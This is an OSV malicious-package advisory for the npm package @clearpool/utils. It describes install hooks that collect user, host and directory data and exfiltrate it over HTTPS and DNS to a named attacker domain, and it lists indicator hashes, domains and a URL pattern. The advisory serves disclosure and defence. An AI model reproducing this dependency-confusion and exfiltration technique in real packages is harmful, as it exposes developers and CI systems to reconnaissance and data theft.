MAL-2026-3059
See a problem?- Import Source
- https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@clearpool/utils/MAL-2026-3059.json
- JSON Data
- https://api.osv.dev/v1/vulns/MAL-2026-3059
- Published
- 2026-04-26T17:25:37Z
- Modified
- 2026-05-13T20:22:38.436168Z
- Summary
- Malicious code in @clearpool/utils (npm)
- Details
-
-= Per source details. Do not edit below this line.=-
Source: amazon-inspector (81591bb660ad3ae2036615d00a3ff6960ccd2f36789a4f0df65a53ea7a557336)
package.json declares
preinstallandinstalllifecycle hooks that collect installer-identifying data (whoami,hostname,pwd,$npm_package_name), base64-encode it, and transmit it to attacker-controlled infrastructure at*.callback.m0chan.co.ukvia two independent channels: an HTTPS GET with the encoded payload in the URL path, and a DNS lookup embedding the encoded package name as a subdomain label (DNS-tunnel exfiltration to bypass HTTP egress filters). The package uses the@clearpoolscope with version99.99.99and empty author metadata — classic dependency-confusion markers aimed at hijacking resolution of an internal package name within organizations that use this scope privately. Any developer or CI system runningnpm installwith this package resolved will leak user, host, working directory, and the requested internal package name to the attacker, providing reconnaissance for follow-on targeted attacks.Source: ossf-package-analysis (402b776bfcc2da45256da8475f7acaa61c2c1f9679e09f0409523062ffe3d823)
The OpenSSF Package Analysis project identified '@clearpool/utils' @ 99.99.99 (npm) as malicious.
It is considered malicious because:
- The package executes one or more commands associated with malicious behavior.
- Database specific
{ "malicious-packages-origins": [ { "import_time": "2026-04-27T01:40:41.886648731Z", "sha256": "b432a00368de0df939eba45db1d503e6e8c7540f17924d524a534026d2487ea8", "source": "ossf-package-analysis", "modified_time": "2026-04-26T17:25:37Z", "versions": [ "9.9.9" ] }, { "import_time": "2026-04-30T22:23:09.292226445Z", "sha256": "aaf42d3e0422cdf2bd133cbfe2bad48be71bff1682908c0b740817555a83d4a9", "source": "amazon-inspector", "modified_time": "2026-04-30T21:59:18Z", "versions": [ "9.9.9" ] }, { "import_time": "2026-05-04T03:13:23.513134014Z", "sha256": "402b776bfcc2da45256da8475f7acaa61c2c1f9679e09f0409523062ffe3d823", "source": "ossf-package-analysis", "modified_time": "2026-05-03T12:37:45Z", "versions": [ "99.99.99" ] }, { "import_time": "2026-05-04T23:49:24.952171956Z", "sha256": "d7ef40ea20810d9e89d3d3998c64d7c1acf6dfdf5f9aafa8765a0c2ec4cfbe54", "source": "ossf-package-analysis", "modified_time": "2026-05-04T13:20:40Z", "versions": [ "100.0.0" ] }, { "id": "IN-MAL-2026-002401", "sha256": "81591bb660ad3ae2036615d00a3ff6960ccd2f36789a4f0df65a53ea7a557336", "import_time": "2026-05-13T20:10:56.665534762Z", "source": "amazon-inspector", "modified_time": "2026-05-12T19:03:07Z", "versions": [ "99.99.99" ] } ] }- References
- Credits
-
-
- Amazon Inspector - FINDER
-
- OpenSSF: Package Analysis - FINDER
-
Affected packages
npm / @clearpool/utils
Package
- Name
- @clearpool/utils
- View open source insights on deps.dev
- Purl
- pkg:npm/%40clearpool/utils
Database specific
indicators
{
"package_integrity": [
{
"filename": "utils-99.99.99.tgz",
"hashes": {
"sha512_sri": "sha512-mc9tFj/bZmwxRws5+RiRNuo4xWn+ZEdxddqpOXtgDwRGGCLAzYaCeG65OrIk/Pd/sFE2MxiEeQYpX5GjgeOeXw==",
"sha1": "a27ed0001e09a22295b08c0f1d0f27b54fa4fe44"
}
}
],
"evidence_files": [
{
"sha256": "5f15d70e40687a733596bf143629b360ebdecaf16cef12052a92c7df34d4ea3a",
"tlsh": "39115c601031de3139e04f781d00a72d75bc6baf323e7f45a20e5a2f001d165766f61a",
"path": "package.json"
}
],
"domains": [
"$pkgsub.callback.m0chan.co.uk"
],
"urls": [
"https://$pkgsub.callback.m0chan.co.uk/$b64"
]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@clearpool/utils/MAL-2026-3059.json"
cwes
[
{
"name": "Embedded Malicious Code",
"description": "The product contains code that appears to be malicious in nature.",
"cweId": "CWE-506"
}
]